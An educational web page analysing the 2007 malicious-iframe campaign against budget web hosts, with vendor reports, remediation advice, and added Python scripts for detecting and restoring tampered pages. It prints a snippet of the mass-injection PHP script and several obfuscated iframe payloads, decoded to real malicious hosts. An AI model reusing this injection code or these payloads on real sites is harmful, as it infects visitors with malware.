Softpanorama (slightly skeptical) Open Source Software Educational Society
Malicious iframe attack
Reportedly, in July 2007 there was a new massive hacking attack on web sites.
The attack targeted primarily budget web hosting providers, but it was not limited
to them; for example, several sites from HBS were compromised too. SANS has
another
List Of Compromised Sites
It looks like the attack usually has two stages.
- Account passwords harvesting. In the first stage they collect passwords
for the accounts. We will call this stage "account passwords harvesting".
Details on how they do that are fuzzy. The truth is that on a typical Linux
server it might be enough to get just one user account password to be in a
reasonably good position to get root via some kind of little-known or
unpatched exploit. Zones and jails are better in this respect, as they
protect other users from easily compromised "suckers" who happily use
passwords like 123456 or browse from spyware-infected PCs at home.
The minimum password complexity should be raised to at least 8
characters, but this does not help if the user's computer is infected with a
keylogger. ISPs need to handle vastly different classes of users, and
security is only as good as the weakest link.
- Mass modification of index files. In the second stage the pool of harvested
passwords is used to modify certain files. We will call this stage "mass modification
of index files". It looks like this stage was automated, using a special
tool called MPACK to install malicious IFrames. Usually only main site
index documents were targeted (i.e. index.php,
index.html, index.shtml,
etc.). Malicious IFrames are usually installed at the beginning or at the end
of the document.
This attack stresses the fact that
Web browsers should now be installed on a VM and used with a special disposable
image of Windows. Please consider using Microsoft Virtual PC or
VMware and opening a separate instance of the OS for browsing if you do
not do it already.
Account passwords harvesting
The best description of the first phase that I found is from
Hosting Reviews at Hostjury.com - Blog
and is related to Dreamhost. In no way should you consider that Dreamhost was alone.
They were just more open about it, and I would give them high credit for that. Most
other providers affected tried to sweep the dirt under the carpet.
According to an e-mail sent out to many Dreamhost clientele earlier today
there have been over 3,500+ hosting accounts exploited at Dreamhost.
The suspected entry point into the accounts was most likely password sniffing
however there are many other rumors surrounding the event.
This exploit quickly followed a recent exploit of IPowerWeb that resulted
in the defacement of over 35% of the IPowerWeb client base. Earlier this year
exploits affected Hostgator & many other large providers whose systems were
rooted.
A copy of the e-mail sent out by the DreamHost team is below:
From: DreamHost Security Team
Subject: URGENT: FTP Account Security Concerns…
This email is regarding a potential security concern related to your ‘XXXX’
FTP account.
We have detected what appears to be the exploit of a number of accounts
belonging to DreamHost customers, and it appears that your account was one
of those affected.
We’re still working to determine how this occurred, but it appears that
a 3rd party found a way to obtain the password information associated with
approximately 3,500 separate FTP accounts and has used that information
to append data to the index files of customer sites using automated scripts
(primarily for search engine optimization purposes).
Our records indicate that only roughly 20% of the accounts accessed -
less than 0.15% of the total accounts that we host - actually had any changes
made to them. Most accounts were untouched.
We ask that you do the following as soon as possible:
- Immediately change your FTP password, as well as that of
any other accounts that may share the same password. We recommend the
use of passwords containing 8 or more random letters and numbers. You
may change your FTP password from the web panel (”Users” section, “Manage
Users” sub-section).
- Review your hosted accounts/sites and ensure that nothing has
been uploaded or changed that you did not do yourself. Many of the
unauthorized logins did not result in changes at all (the intruder logged
in, obtained a directory listing and quickly logged back out) but to
be sure you should carefully review the full contents of your account.
Again, only about 20% of the exploited accounts showed any modifications,
and of those the only known changes have been
to site index documents (ie. ‘index.php’, ‘index.html’, etc
- though we recommend looking for other changes as well).
It appears that the same intruder also attempted
to gain direct access to our internal customer information database,
but this was thwarted by protections we have in place to prevent such access.
Similarly, we have seen no indication that the intruder accessed other customer
account services such as email or MySQL databases.
In the last 24 hours we have made numerous significant behind-the-scenes
changes to improve internal security, including the discovery and patching
to prevent a handful of possible exploits.
We will, of course, continue to investigate the source of this particular
security breach and keep customers apprised of what we find. Once we learn
more, we will be sure to post updates as they become available to our status
weblog: http://www.dreamhoststatus.com/
Thank you for your patience. If you have any questions or concerns, please
let us know.
Mass modification of site files
In the second stage the pool of harvested passwords is used to modify certain
files. We will call this stage "mass modification of index files". It looks like
this stage was automated, using a special tool called MPACK to install
malicious IFrames. Usually only main site index documents were targeted (i.e. index.php,
index.html, index.shtml, etc.). Malicious IFrames are usually installed
at the beginning or at the end of the document; the difference is probably due to
different tools or different versions/modes of operation of MPACK. But there are other cases
where all documents were modified by replacing the </body> tag
[SANS Internet Storm Center]:
After checking where the compromised web sites were hosted, it became clear
to us that we were dealing with a mass defacement when a single (or multiple)
physical web servers were hosting thousands of web sites.
One of our readers sent us a PHP script he acquired from a compromised web
server. The PHP script is pretty simple, and all it does is traverse through
the file system and modify all files so that a malicious iframe tag is appended.
Two things were obvious here:
- The hosting web server did not have proper
security on the file system level. This is, unfortunately, pretty common
for (cheap?) hosting servers and is required when PHP is executed as a module
in Apache. In this case, the main Apache process must be able to at least
read all the files, but it appeared that it was able to write to them as
well (wrong file permissions maybe?).
- The attackers had to find only one vulnerable PHP script
on the server (note – the server might have been hosting thousands of different
web sites).
Once attackers found a vulnerable PHP script they first detected the directory
hierarchy on the web site. In case of the sample PHP script we received, it
looked like this:
for ($i = 3; $i < 500; $i++) {
    if ($i == 438) continue;
    flush_buffer('<b>/home/sites/site' . $i . '/web</b>:<br>');
    iframe_account(array('/home/sites/site' . $i . '/web'));
}
From the code snippet above, you can see that all sites have their document
root directory set as /home/sites/site[number]/web. The loop creates an array
which is then passed to another function called iframe_account().
This function takes every directory and performs a recursive search for 4
file types:
$file_types = array('php', 'htm', 'html', 'tpl');
It then opens the files and searches for the “</body>” tag which is replaced
with the malicious iframe and properly closed:
$iframed_content = str_replace('</body>',
'<iframe src=http://[REMOVED].info/counter style=display:none></iframe></body>',
$content);
And voila – a mass compromise happened.
Here is how the Symantec Security Response Weblog describes the tool:
You always thought that by staying clear of the
dark alleys of the Internet and visiting only “reputable” websites, you would
be safe from attacks and dubious content. I am afraid that is not enough.
My colleagues Elia Florio and Hon Lau reported recently (here
and
here) about legitimate sites that had been compromised to include a malicious
IFRAME that, without your knowledge, redirects you to a site serving exploits.
As Elia mentioned, thousands of sites (mostly Italian, but with several other
nationalities included) were compromised. We were puzzled as to how the MPack
gang had managed to hack so many sites in a short period of time, and how they
could inject the malicious iframe so quickly.
The MPack gang appears to be using an IFRAME Manager tool to automate the
task on a large scale. This is basically an FTP updater client, written in PHP
language, that runs on a webserver with MySQL as back-end. It takes as input
a list of website administrator accounts (possibly obtained in the black market).
It then periodically checks the home pages of those sites to inject a chosen
IFRAME into their code.
This iframe manager is another example of a very user-friendly tool with
a clear intent of being resold to multiple hacking groups. As such, it offers
a number of interesting features. It allows for the iframe to be injected at
the top or bottom of the page and you can use regular expressions when defining
the pages to be compromised, such as index[.php|.htm|.html]|default.asp. To
maximize the return-on-investment, the tool can check the Google PageRank for
the potential websites before injecting the iframe, allowing you to select any
number of sites with a certain PageRank in a certain country. Furthermore, the
tool can be left running and will cycle through the list of sites and re-inject
the iframe, should the pages have been cleaned by the site administrator.
To assist the miscreants in this competitive hacker-eat-hacker world, the
tool also allows for the removal of any competitors’ iframes injected in the
page. And of course, extensive logs and statistics are provided.
This tool itself however, cannot hack the websites; it relies on a list of
compromised credentials to insert the desired iframe into the websites. Therefore
a simple clean-up of the page is not sufficient; the site administrator’s credentials
need to be changed. To protect yourself as a web surfer, make sure your operating
system is up to date with latest patches as well as your anti-virus program.
Posted by Amado Hidalgo on June 19, 2007 11:39 AM
The actual exploit is an encoded IFRAME pointing to the web site with malware.
"Right now, we are not sure whether the porn sites are compromised to host
the IFRAMES, are created to do so, or are being paid to host the IFRAMES," acknowledged
Trend Micro. The attack probably began June 17, the company said.
Other researchers have continued to dig into the Mpack-based attacks and
have shared some of their findings. Symantec, for instance, asked how hackers
were able to infect so many sites in such a short time, and how they could inject
the necessary IFRAMES code -- the malicious code they added to the legitimate
sites' HTML that redirected visitors to the Mpack server -- so quickly.
Pages on hacked web sites are modified using an IFRAME to connect to one of many
"seed sites" which run scripts that either:
- Use social engineering to entice the user to download a malicious Trojan
onto his PC (for example by masking it as a plug-in that is needed to view
the content). In this case the Trojan download is usually disguised
as a plug-in from a reputable vendor (for example Microsoft) that is
supposedly necessary for viewing the hacked site. Some gullible users accept
such an invitation.
- Try a series of web browser exploits to break into a PC with unpatched
IE6 or Firefox.
- There is an old vulnerability covered in
Microsoft Security Bulletin MS04-040 HTML Elements Vulnerability
- CAN-2004-1050: a remote code execution vulnerability exists in unpatched
Internet Explorer. An attacker could exploit the vulnerability by constructing
a malicious Web page, so that visiting a malicious Web site could lead to
remote code execution; an attacker who successfully exploited this
vulnerability could take complete control of an affected system.
- Possibly use other, more subtle attack vectors.
- Insert invalid information into the viewstate field with the objective
of causing the application to throw an exception and to log the exception.
If, however, you open the error log file via a browser and the application's
error log viewer, some of what the attacker has inserted into the viewstate
may be rendered as HTML. If the attacker has put in an iframe with a reference
to a live web page, you would in effect be forced to load that web page.
This is not dissimilar to visiting a website with hostile scripting
code.
Recommended webmaster reaction to the exploit
- Save the hacked index page for further analysis and restore the page from your
archive. If you do not have an archive, locate the fragment in the index page
and delete it (see below on how to do that).
- Change your FTP account password. Most probably it was compromised.
- If possible, reconfigure your FTP account to accept connections only from
the IP range that you use (if you use DHCP this can be the IP range of your ISP).
- If possible, block access to the sites which provide web services for the exploit
(see below on how to determine them from the encoded string in the exploit).
- Search your web pages using grep for strings like
"document.write(unescape("
or another notable string that you can detect on the affected page, for example:
<script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%6F%74%62%61%6C%6C%70%6F%72%74%61%6C%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</script>
That will give some assurance that this exploit was used only on the index
document of your web site and was not replicated on other pages.
- Install a cron script that periodically searches your web pages for
the string typical of the exploit used ("document.write(unescape("
in the case above), sends you email
if it is found, and restores the file(s) in question
from the backup.
- Check whether your ISP uses the latest version of Apache with security fixes.
You can check this using telnet:
telnet www.mysite.com 80
12:12
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>501 Method Not Implemented</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
♥ to /index.html not supported.<P>
Invalid method in request \x03<P>
<HR>
<ADDRESS>Apache/1.3.33 Server at myhost.myisp.com Port 80</ADDRESS>
</BODY></HTML>
Connection to host lost.
Here you can see that the version of the web server is old. That does
not necessarily mean that it is vulnerable, but it is still of some
concern (the latest is 1.3.37).
- If you have custom scripts it might be prudent to analyze their security.
Decoding the IFRAME content and determining the site with malicious content
The encoded fragment that you have found can be decoded via many sites. For example
you can use the
HTML & JavaScript Encoder-Decoder. In the case of the exploit listed above the actual code is as
follows:
<iframe src="http://fotballportal.info/out.php?s_id=1"
style="visibility: hidden; display: none">
</iframe>
That means that you need to block 203.121.73.33
to increase the chances of avoiding infecting users in case of reinfection.
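Decoding such a fragment can also be scripted instead of pasted into a web decoder. The following is an added example of mine, not code from the article or from any of the tools it describes: it decodes document.write(unescape(...)) payloads, tolerates the stray spaces that appear when a fragment is copied out of a forum post, also catches the plain iframe written by the str_replace('</body>') variant of the ISC script, and lists the hosts an administrator would need to block. The samples are the fragment from this page, the first of the five iframes from the forum post quoted later on this page, and a constructed plain iframe using the placeholder host counter.example.invalid.

```python
import re
from typing import Dict, List, Optional

# The obfuscation used in this campaign: document.write(unescape('...')).
# The quoted argument may be wrapped across lines and, when copied out of a
# forum post, may contain stray spaces, so whitespace inside it is tolerated.
UNESCAPE_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL,
)

# An iframe tag and its src attribute. The value may be unquoted and there may
# be whitespace around '=' (both forms occur in the samples quoted on this page).
IFRAME_SRC_RE = re.compile(
    r"<\s*iframe\b[^>]*?\bsrc\s*=\s*['\"]?\s*([^'\"\s>]+)",
    re.IGNORECASE | re.DOTALL,
)


def decode_unescape(payload: str) -> str:
    """Reproduce JavaScript unescape(): drop line-wrap whitespace, then turn
    %uXXXX and %XX sequences back into characters."""
    compact = re.sub(r"\s+", "", payload)
    compact = re.sub(r"%u([0-9A-Fa-f]{4})",
                     lambda m: chr(int(m.group(1), 16)), compact)
    return re.sub(r"%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), compact)


def host_of(src: str) -> Optional[str]:
    """Host part of an absolute URL, or None for a relative src such as exp1.htm."""
    m = re.match(r"^[A-Za-z][A-Za-z0-9+.-]*://([^/?#:]+)", src)
    return m.group(1).lower() if m else None


def find_injected_iframes(html: str) -> List[Dict]:
    """One record per iframe, whether hidden inside unescape() or written
    plainly (the str_replace('</body>', ...) variant from the ISC script)."""
    findings = []
    for m in UNESCAPE_RE.finditer(html):
        for src in IFRAME_SRC_RE.findall(decode_unescape(m.group(2))):
            findings.append({"src": src, "obfuscated": True, "host": host_of(src)})
    # Remove the obfuscated calls before the plain scan so nothing is counted twice.
    for src in IFRAME_SRC_RE.findall(UNESCAPE_RE.sub("", html)):
        findings.append({"src": src, "obfuscated": False, "host": host_of(src)})
    return findings


def hosts_to_block(html: str) -> List[str]:
    """Distinct hosts referenced by injected iframes, for firewall or proxy rules."""
    return sorted({f["host"] for f in find_injected_iframes(html) if f["host"]})


# Sample 1: the fragment quoted earlier on this page.
SAMPLE_PAGE = """<html><body>
<script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%6F%74%62%61%6C%6C%70%6F%72%74%61%6C%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</script>
</body></html>"""

# Sample 2: first iframe of the forum post quoted below, including the stray
# spaces ("% 73", "%3 1") that the line wrap inserted into the payload.
SAMPLE_PASTED = """<script>
document.write(unescape("%3c%69%66%72%61%6d%65%20% 73%72%63%3d%22%65%78%70%31%2e%68%74%6d%22%20%77%69
%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%3 1%22%3e%3c%2f%69%66%72%61%6d%65%3e"));
</script>"""

# Sample 3 (constructed): the plain form the ISC script writes before </body>.
SAMPLE_PLAIN = ('<html><body><p>Welcome</p>'
                '<iframe src=http://counter.example.invalid/counter style=display:none>'
                '</iframe></body></html>')
```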
Recommendations for ISPs
ISPs which do not provide users with shell access might be hurt if such attacks
become recurrent, as this is in essence an attack on the business model of cheap,
reliable hosting, where part of the reliability is achieved by not providing ssh access
to users.
I would propose several steps that can compensate for the lack of shell access:
- It is unclear how they harvest passwords, and finding the answer to this
question is of paramount importance. If user passwords are stored in clear text,
you should consider adopting a hashing scheme instead.
- One of the problems is the weakness of VDECK as software for those ISPs
which use it (I have no experience with Cpanel).
  - Press the VDECK vendor to do a better job.
  - Fix the bugs in VDECK, for example in blocking sites (old versions
generate a wrong .htaccess file).
- Provide users with several "precooked" cron scripts:
  - To list all files on the server modified during the last 24 hours
and all files that contain the string "document.write(unescape("
  - To untar an arbitrary file (the VDECK solution for restoring backups is stupid
beyond any redemption). This can be used for periodic restoration
of the site index from the tar.gz backup. If several files were compromised
they all should be listed in the cron script.
  - To tar an arbitrary subtree of the site, excluding certain types of files
(.gz, .zip, etc).
- It looks like the attack targets Apache, so there might be a need to revise
and improve the Apache configuration to make it more resistant to attacks.
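The cron job recommended for webmasters above and the "precooked" scripts proposed here for ISPs (list files modified in the last 24 hours and files containing the marker string, restore the index from a tar.gz backup) amount to one small program. The following is an added example of mine, not part of the article or of any hosting panel: a Python script meant to run from cron that flags recently changed web documents, restores those carrying the marker from the backup archive, and prints a report (cron mails any output to MAILTO). demo_run() builds a constructed throwaway site and backup to show the whole flow.

```python
import os
import shutil
import sys
import tarfile
import tempfile
import time
from typing import Dict, List, Optional, Tuple

# Document types the injection script quoted from the ISC report searched for,
# plus .shtml from the article's list of targeted index documents.
WEB_EXTENSIONS = (".php", ".htm", ".html", ".shtml", ".tpl")
# The string the article recommends searching for.
DEFAULT_MARKER = "document.write(unescape("


def find_suspect_files(web_root: str, marker: str = DEFAULT_MARKER,
                       max_age_hours: float = 24.0,
                       now: Optional[float] = None) -> List[Tuple[str, str]]:
    """Return (site-relative path, reason) for every web document under
    web_root that was modified within max_age_hours or contains the marker."""
    cutoff = (time.time() if now is None else now) - max_age_hours * 3600
    suspects = []
    for dirpath, _dirs, files in os.walk(web_root):
        for name in files:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            reasons = []
            if os.path.getmtime(full) >= cutoff:
                reasons.append("recently modified")
            with open(full, "rb") as fh:
                if marker.encode() in fh.read():
                    reasons.append("contains marker")
            if reasons:
                suspects.append((os.path.relpath(full, web_root), "; ".join(reasons)))
    return sorted(suspects)


def restore_from_backup(backup_tgz: str, web_root: str,
                        rel_paths: List[str]) -> List[str]:
    """Overwrite the named site-relative files with their copies from the
    tar.gz backup. Only regular-file members with an exactly matching name are
    written, and names that would escape web_root are refused."""
    wanted = {p for p in rel_paths
              if not os.path.isabs(p) and ".." not in p.split(os.sep)}
    restored = []
    with tarfile.open(backup_tgz, "r:gz") as tar:
        for member in tar.getmembers():
            if member.name in wanted and member.isfile():
                dest = os.path.join(web_root, member.name)
                os.makedirs(os.path.dirname(dest), exist_ok=True)
                with open(dest, "wb") as out:
                    out.write(tar.extractfile(member).read())
                restored.append(member.name)
    return sorted(restored)


def check_and_restore(web_root: str, backup_tgz: str,
                      marker: str = DEFAULT_MARKER,
                      max_age_hours: float = 24.0) -> Dict[str, list]:
    """Cron job body: detect, put back only the files that carry the marker
    (recently modified files are reported but left alone), return a report."""
    suspects = find_suspect_files(web_root, marker, max_age_hours)
    infected = [rel for rel, why in suspects if "contains marker" in why]
    restored = restore_from_backup(backup_tgz, web_root, infected) if infected else []
    return {"suspects": suspects, "infected": infected, "restored": restored}


def format_report(report: Dict[str, list]) -> str:
    """Plain-text report; under cron anything printed is mailed to MAILTO."""
    lines = ["Web integrity check: %d suspect file(s)" % len(report["suspects"])]
    lines += ["  SUSPECT  %s (%s)" % item for item in report["suspects"]]
    lines += ["  RESTORED %s from backup" % rel for rel in report["restored"]]
    return "\n".join(lines)


def demo_run() -> Dict[str, list]:
    """Constructed fixture: a two-page site, a clean backup, then index.html
    tampered with as the article describes. Returns the report plus the index
    content after the run so the outcome can be checked."""
    root = tempfile.mkdtemp(prefix="iframe-demo-")
    try:
        clean = "<html><body>hello</body></html>\n"
        os.mkdir(os.path.join(root, "web"))
        for name in ("index.html", "about.html"):
            with open(os.path.join(root, "web", name), "w") as fh:
                fh.write(clean)
        backup = os.path.join(root, "site.tar.gz")
        with tarfile.open(backup, "w:gz") as tar:
            tar.add(os.path.join(root, "web"), arcname="web")
        # Tamper with the index page (constructed, inert text carrying the marker).
        with open(os.path.join(root, "web", "index.html"), "a") as fh:
            fh.write("<script>document.write(unescape('%3Ciframe%3E'))</script>\n")
        report = check_and_restore(root, backup)
        with open(os.path.join(root, "web", "index.html")) as fh:
            report["index_after"] = fh.read()
        report["text"] = format_report(report)
        return report
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: %s WEB_ROOT BACKUP_TGZ" % sys.argv[0])
    result = check_and_restore(sys.argv[1], sys.argv[2])
    if result["suspects"]:
        print(format_report(result))
```

Restoring the page without changing the FTP password only buys time: as the Symantec description above notes, the tool cycles through its list and re-injects the iframe once the page has been cleaned.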
As Sophos mentions in its blog entry "Mal-ObfJS-C Where When":
Sophos, meanwhile, analyzed the nearly 4,000 compromised sites it had
found delivering the malicious IFRAMES code, and found that the overwhelming
majority -- 98 percent to be exact -- were running the Apache Web server.
"The servers targeted in this attack have almost exclusively been running
some flavor of Apache on Unix," said Sophos in a blog entry
<http://www.sophos.com/security/blog/2007/06/250.html>
Friday.
That might be just a side effect of the fact that this attack targeted budget
ISPs.
"... the servers targeted in this attack have almost exclusively been
running some flavour of Apache on Unix."
22 June 2007 11:42 GMT
For the past 7 weeks SophosLabs have been tracking an attack targeting sites
all over the world. In the attack, legitimate sites have been compromised so
that they serve up a malicious JavaScript (Mal/ObfJS-C).
In this post, I present a brief summary of the data obtained thus far.
Since May 1st, we have found 3,896 URLs that have been compromised, over
1,627 different domains. The subject matter of the hacked sites covers as wide
a range of topics as you can imagine. Clothes boutiques, driving instruction,
nude beauty pageants, celebrity gossip, hypnotherapy through to handmade musical
instruments. Most worryingly, there are some fairly popular sites within the
list, including a fairly large bank (this site was hacked last week). Taking
a deeper look at the data, we can gather further information about this campaign.
As you can see from the following graph (note the log scale on the y-axis),
the vast bulk of the compromised pages are being served up from sites in the
United States, closely followed by Brazil, Canada and the UK.

It should be noted this data is based on the country in which the host web
server resides - it does not indicate the locale of the site itself. For example,
several ‘.co.uk’ domains were found to be hosted within the US.
To get a true impression of the scale of such an attack, looking at domain
names alone is insufficient. We have encountered previous cases where initial
data based on a plethora of compromised domains has suggested a large campaign,
only to find that they all were as the result of the hacking of a handful of
boxes within a single service provider (Troj/EncIfr-A for example). Looking
at this data from an IP perspective reveals 324 unique IP addresses, the bulk
of which are hosting a low number of compromised sites.

As might be expected, we can see that in several cases, once the hackers
have managed to hack a server, they have compromised several sites hosted there.
Probing further, we can try to identify the operating system and web server
application. As you can see below, the servers targeted
in this attack have almost exclusively been running some flavour of Apache on
Unix.

Though we cannot deduce the method employed by the hackers to compromise
the servers, such data is nonetheless interesting. Gathering and analysis of
such data provides us with valuable information to assist in the fight against
web attacks. As ever, it is imperative that web servers are maintained and patched
to the latest level. If you outsource the responsibility
of this to your ISP, ensure they follow good practice. Remember,
their failure could lead to your loss of credibility if it
is your site that gets hacked into a malicious drive-by.
Fraser, SophosLabs UK
Typical reaction after discovery of the embedded iframe:
Could someone help me out and tell me what this is:
<html>
<body>
<script>
document.write(unescape("%3c%69%66%72%61%6d%65%20% 73%72%63%3d%22%65%78%70%31%2e%68%74%6d%22%20%77%69
%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%3 1%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%
61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d %22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%6
8%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a% 3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33
%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%6 8%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%
6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22 %65%78%70%34%2e%68%74%6d%22%20%77%69%64%74%68%3d%2
2%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f% 69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73
%72%63%3d%22%65%78%70%35%2e%68%74%6d%22%20%77%69%6 4%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%
22%3e%3c%2f%69%66%72%61%6d%65%3e"));
</script>
</body>
</html>
Nir wrote:
> Andrés M. wrote:
>> Hello, This morning I opened Thunderbird and went to the m.s.firefox
>> newsgroup. I clicked first on the mail with subject "Could this
>> exploit code from a malware site affect Firefox?" and while the mail
>> window was blank and still loading I immediately clicked on the mail
>> with subject "Really really really annoying and persistent display
>> problem...". Almost instantly the latter mail was on screen. Then
>> clicked on the Back button to see the first mail and what I got was a
>> mix of the first half of the first mail with the full content of the
>> second mail (including header) appended below. The resulting content
>> is pasted at the end of this mail. The header of the second mail may
>> be a little different, I copied it manually from an exported text
>> file of the second mail. Look for the word "unescaping" to reach the
>> point where both mails got mixed.
>> I am unable to reproduce this strange event again, but it definitely
>> happened so I wonder if someone can take a look at it.
> either an extensions is causing this -
> "https://bugzilla.mozilla.org/show_bug.cgi?id=370473#c0"
> or it's the theme, you are using , which is misbehaving -
> "https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c36"
> "https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c23"
Oops, sorry I forgot to mention but I'm using Thunderbird 2.0.0.4
completely clean, no extra themes and no add-ons except "Talkback" which
comes with the installer.
Thanks for your reply, but add-ons are certainly not the cause.
"OMA" <omol...@inicia.es> wrote in news:qfqdnQjMOOgmsOLbnZ2dnUVZ_rCsnZ2d@mozilla.org:
> I'd like to know if that code could exploit any vulnerability
> in Firefox, and thus if it may have affected my system.
No. In IE, clicking on the executable would run it.
In FF, you can only download an executable file,
then you have to browse to the saved file and click it yourself, manually.
-- Mozilla & Netscape FAQs: http://www.ufaq.org/ Mozilla/Firefox/Thunderbird/Seamonkey
solutions: http://ilias.ca/ Web page validation:
http://validator.w3.org
About Mozilla: http://www.mozilla.org Ambition is a poor excuse for not having
the good sense to be lazy.
Newsgroups: mozilla.support.firefox
From: Chris Jahn <clj...@netscape.net.invalid>
Date: Sun, 24 Jun 2007 22:00:23 -0500
Subject: Re: Could this exploit code from a malware site affect Firefox?

Newsgroups: mozilla.support.firefox
From: Aggro <spammerdr...@yahoo.com>
Date: Mon, 25 Jun 2007 17:48:44 +0300
Subject: Re: Could this exploit code from a malware site affect Firefox?
OMA wrote:
> Hello, I've accidentally entered a malware site by following an e-mail link
> to www.duhymn.hk (be careful NOT to enter that site with a browser).
> When I entered the site with Firefox 2.0.0.4, the browser immediately
> froze.
There seems to be a large loop. That probably caused your browser to
freeze. Freezing is not an indication that they managed to do something to
your computer.
It looks like "Internet Explorer createControlRange Object Buffer
Overflow":
http://www.juniper.net/security/auto/vulnerabilities/vuln1850.html
So probably only IE users are in danger. I didn't read the whole code,
so I don't know if there is something else also. But I very much doubt
that you would be in danger as you were using 2.0.0.4.
--
Solutions for issues with Firefox:
http://kb.mozillazine.org/Category:Issues_%28Firefox%29
WOW this is ALL from omega-it.ru. Wow, I feel sorry
for that computer network.
We got warezov and zhelatin and nuwar, ircbot, magnoia, and lineage, spys and
bankers and a few sdbots. Wow, just from one computer network:
Ethan Zuckerman has a fascinating story about how contemporary malware
works. It begins with him Googling a friend to find
the URL of her home page, only to find that Google wouldn’t connect him
to her site and flashed up the warning “This site may harm your computer”.
It transpired that this is the result of the StopBadware campaign run by
the folks at the Berkman Center; Google identifies sites that it believes
are spreading malware and registers them with Stop Badware. If a site has
been blacklisted, its owner has the option of protesting and having his/her
case reviewed by the Berkman people. Ethan duly protested on his friend’s
behalf…
Within half an hour, three of my colleagues pointed me to the source
code of my friend’s page. At the top of her index page was a strange-looking
piece of Javascript:
<script language="javascript"> document.write( unescape(
'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68' +
'%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34' +
'%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D' +
'%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D' +
'%22%30%22%20%77%69%64%74%68%3D%22%31%22%20' +
'%68%65%69%67%68%74%3D%22%31%22%20%73%63%72' +
'%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61' +
'%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69' +
'%66%72%61%6D%65%3E'
) ); </script>
That’s some seriously obfuscated Javascript. But if you translate
from hexadecimal to ASCII, the code’s pretty clear - it inserts the
following code into the top of the HTML page:
<iframe src= http://81.95.146.98/index.html
frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
The code opens an “iframe”, an inline frame which allows another
web page to be embedded within a page - iframes are pretty useful things,
especially for building interactive applications in web pages. But this
frame is pretty sinister. It opens a one pixel by one pixel frame which
attempts to load the webpage located at http://81.95.146.98/index.html.
That page doesn’t load on my browser - the server is apparently refusing
connections, at least from my Macintosh - but it occupies an IP in a
block of addresses controlled by a charming bunch of guys who do business
as RBusiness Network. Google for them and you’ll mostly find lots of
angry message board posts from spamfighters - the RBusiness folks operate
a number of servers advertised in spam emails and are suspected of relaying
large amounts of spam. Many of the RBusiness-associated webpages are
in Russian, though their servers are currently in Panama City, Panama
- some antispammers believe that RBusiness is short for "Russian Business
Network", which was evidently their previous operating name.
Googling for the specific IP - 81.95.146.98 - turns up a couple of
pages with people documenting an interesting exploit - the Microsoft
Data Access Components exploit. Basically, when you load this iframe,
it runs a small script which downloads and runs a Windows executable
file. That file downloads a rootkit, a password sniffer and opens a
backdoor into the user’s system. (Needless to say, this only happens
on Microsoft Windows systems running unpatched software… which is to
say, many Windows systems.) According to Ivan Macalintal, this iframe
was installing code from websites that looked fairly innocuous, including
one that promised to help you write your company’s travel policy. (Remarkably,
this site is the #1 match for a search for “travel policy” on Google,
though Google doesn’t let you click directly to the page, stopping you
with a “harm your computer” message.)
It’s possible that this is what my friend’s site was trying to install
- Ivan’s report dates from October 2006. It’s also possible that it
was trying to install a more recent package of malware - Trojan-PSW.Win32.Small.bs
- which Avira saw linked to the 81.95.126.98 domain in early January
of this year. This little nasty logs passwords entered on webpages,
opens a SOCKS proxy on your machine and calls home to an RBusiness server
to let the bad guys know how to take advantage of your new machine to
send spams and retrieve your passwords.
So had Ethan’s friend got into bed with these Russian hoodlums? Unlikely.
Simply put, [her site] was hacked. Not content with setting up websites
to spread their trojan horses, the RBusiness boys have been breaking
into blog and wiki sites and installing this new iframe. In some cases,
they’re able to guess default passwords; in other cases, they exploit
unpatched bugs in software. I was all ready to go to Berkman yesterday
with my tail between my legs and tell my colleagues that my friend’s
server had been compromised. But my friends were already dealing with
the fact that Google had found malicious iframes on a number of Harvard-affiliated
sites, including several blogs hosted on the blogs.law.harvard.edu server!
